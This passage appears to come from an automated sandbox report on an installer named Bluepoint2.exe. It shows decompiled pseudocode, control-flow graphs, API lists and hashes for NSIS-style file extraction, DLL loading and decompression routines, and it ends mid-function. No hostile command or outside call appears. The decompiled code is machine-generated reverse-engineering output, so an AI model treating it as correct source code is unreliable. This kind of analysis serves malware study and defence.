                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Bluepoint2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 2803837635-1714803208
                                                                                                                                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                                                                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 804 40176f-401794 call 402da6 call 405fae 809 401796-40179c call 406668 804->809 810 40179e-4017b0 call 406668 call 405f37 lstrcatW 804->810 816 4017b5-4017b6 call 4068ef 809->816 810->816 819 4017bb-4017bf 816->819 820 4017c1-4017cb call 40699e 819->820 821 4017f2-4017f5 819->821 828 4017dd-4017ef 820->828 829 4017cd-4017db CompareFileTime 820->829 823 4017f7-4017f8 call 406133 821->823 824 4017fd-401819 call 406158 821->824 823->824 831 40181b-40181e 824->831 832 40188d-4018b6 call 4056ca call 403371 824->832 828->821 829->828 833 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 831->833 834 40186f-401879 call 4056ca 831->834 846 4018b8-4018bc 832->846 847 4018be-4018ca SetFileTime 832->847 833->819 868 401864-401865 833->868 844 401882-401888 834->844 848 402c33 844->848 846->847 850 4018d0-4018db CloseHandle 846->850 847->850 851 402c35-402c39 848->851 853 4018e1-4018e4 850->853 854 402c2a-402c2d 850->854 856 4018e6-4018f7 call 4066a5 lstrcatW 853->856 857 4018f9-4018fc call 4066a5 853->857 854->848 861 401901-402398 856->861 857->861 866 40239d-4023a2 861->866 867 402398 call 405cc8 861->867 866->851 867->866 868->844 869 401867-401868 868->869 869->834
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668("C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp");
						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                                    0x0040176f
                                                                                                                                    0x00401776
                                                                                                                                    0x00401782
                                                                                                                                    0x00401785
                                                                                                                                    0x0040178a
                                                                                                                                    0x0040178d
                                                                                                                                    0x00401794
                                                                                                                                    0x004017b0
                                                                                                                                    0x00401796
                                                                                                                                    0x00401797
                                                                                                                                    0x00401797
                                                                                                                                    0x004017b6
                                                                                                                                    0x004017bb
                                                                                                                                    0x004017bb
                                                                                                                                    0x004017bf
                                                                                                                                    0x004017c2
                                                                                                                                    0x004017c7
                                                                                                                                    0x004017c9
                                                                                                                                    0x004017cb
                                                                                                                                    0x004017d0
                                                                                                                                    0x004017d0
                                                                                                                                    0x004017db
                                                                                                                                    0x004017db
                                                                                                                                    0x004017ec
                                                                                                                                    0x004017ee
                                                                                                                                    0x004017ee
                                                                                                                                    0x004017ef
                                                                                                                                    0x004017ef
                                                                                                                                    0x004017f2
                                                                                                                                    0x004017f5
                                                                                                                                    0x004017f8
                                                                                                                                    0x004017f8
                                                                                                                                    0x004017ff
                                                                                                                                    0x0040180e
                                                                                                                                    0x00401813
                                                                                                                                    0x00401816
                                                                                                                                    0x00401819
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040181b
                                                                                                                                    0x0040181e
                                                                                                                                    0x00401874
                                                                                                                                    0x00401879
                                                                                                                                    0x004015b6
                                                                                                                                    0x0040292e
                                                                                                                                    0x0040292e
                                                                                                                                    0x00402c2a
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00000000
                                                                                                                                    0x00401820
                                                                                                                                    0x00401826
                                                                                                                                    0x0040182d
                                                                                                                                    0x0040183a
                                                                                                                                    0x00401845
                                                                                                                                    0x0040185b
                                                                                                                                    0x0040185b
                                                                                                                                    0x0040185e
                                                                                                                                    0x00000000
                                                                                                                                    0x00401864
                                                                                                                                    0x00401864
                                                                                                                                    0x00401865
                                                                                                                                    0x00401882
                                                                                                                                    0x00402c33
                                                                                                                                    0x00402c33
                                                                                                                                    0x00402c33
                                                                                                                                    0x00401867
                                                                                                                                    0x00401867
                                                                                                                                    0x00401868
                                                                                                                                    0x00401493
                                                                                                                                    0x0040239d
                                                                                                                                    0x0040239d
                                                                                                                                    0x0040239d
                                                                                                                                    0x00401865
                                                                                                                                    0x0040185e
                                                                                                                                    0x00402c35
                                                                                                                                    0x00402c39
                                                                                                                                    0x00402c39
                                                                                                                                    0x00401892
                                                                                                                                    0x00401897
                                                                                                                                    0x004018a5
                                                                                                                                    0x004018aa
                                                                                                                                    0x004018b0
                                                                                                                                    0x004018b4
                                                                                                                                    0x004018b6
                                                                                                                                    0x004018be
                                                                                                                                    0x004018ca
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018bc
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d9
                                                                                                                                    0x004018db
                                                                                                                                    0x00000000
                                                                                                                                    0x004018e1
                                                                                                                                    0x004018e1
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018fc
                                                                                                                                    0x004018e6
                                                                                                                                    0x004018e9
                                                                                                                                    0x004018f2
                                                                                                                                    0x004018f2
                                                                                                                                    0x00401901
                                                                                                                                    0x00401906
                                                                                                                                    0x00402398
                                                                                                                                    0x00000000
                                                                                                                                    0x00402398
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh937B.tmp$C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dll$Call
                                                                                                                                    • API String ID: 1941528284-16621105
                                                                                                                                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                                                                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                                                                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                                                                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 870 4069c5-4069e5 GetSystemDirectoryW 871 4069e7 870->871 872 4069e9-4069eb 870->872 871->872 873 4069fc-4069fe 872->873 874 4069ed-4069f6 872->874 876 4069ff-406a32 wsprintfW LoadLibraryExW 873->876 874->873 875 4069f8-4069fa 874->875 875->876
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                                    0x004069dc
                                                                                                                                    0x004069e5
                                                                                                                                    0x004069e7
                                                                                                                                    0x004069e7
                                                                                                                                    0x004069eb
                                                                                                                                    0x004069fe
                                                                                                                                    0x004069f8
                                                                                                                                    0x004069f8
                                                                                                                                    0x004069f8
                                                                                                                                    0x00406a17
                                                                                                                                    0x00406a2b
                                                                                                                                    0x00406a32

                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                                    • wsprintfW.USER32 ref: 00406A17
                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                                                                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406BB0 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 198COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 877 406bb0-406bd3 878 406bd5-406bd8 877->878 879 406bdd-406be0 877->879 880 4075fd-407601 878->880 881 406be3-406bec 879->881 882 406bf2 881->882 883 4075fa 881->883 884 406bf9-406bfd 882->884 885 406d39-4073e0 882->885 886 406c9e-406ca2 882->886 887 406d0e-406d12 882->887 883->880 890 406c03-406c10 884->890 891 4075e5-4075f8 884->891 898 4073e2-4073f8 885->898 899 4073fa-407410 885->899 888 406ca8-406cc1 886->888 889 40754e-407558 886->889 892 406d18-406d2c 887->892 893 40755d-407567 887->893 895 406cc4-406cc8 888->895 889->891 890->883 896 406c16-406c5c 890->896 891->880 897 406d2f-406d37 892->897 893->891 895->886 901 406cca-406cd0 895->901 902 406c84-406c86 896->902 903 406c5e-406c62 896->903 897->885 897->887 900 407413-40741a 898->900 899->900 904 407441-40744d 900->904 905 40741c-407420 900->905 906 406cd2-406cd9 901->906 907 406cfa-406d0c 901->907 910 406c94-406c9c 902->910 911 406c88-406c92 902->911 908 406c64-406c67 GlobalFree 903->908 909 406c6d-406c7b GlobalAlloc 903->909 904->881 912 407426-40743e 905->912 913 4075cf-4075d9 905->913 915 406ce4-406cf4 GlobalAlloc 906->915 916 406cdb-406cde GlobalFree 906->916 907->897 908->909 909->883 917 406c81 909->917 910->895 911->910 911->911 912->904 913->891 915->883 915->907 916->915 917->902
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
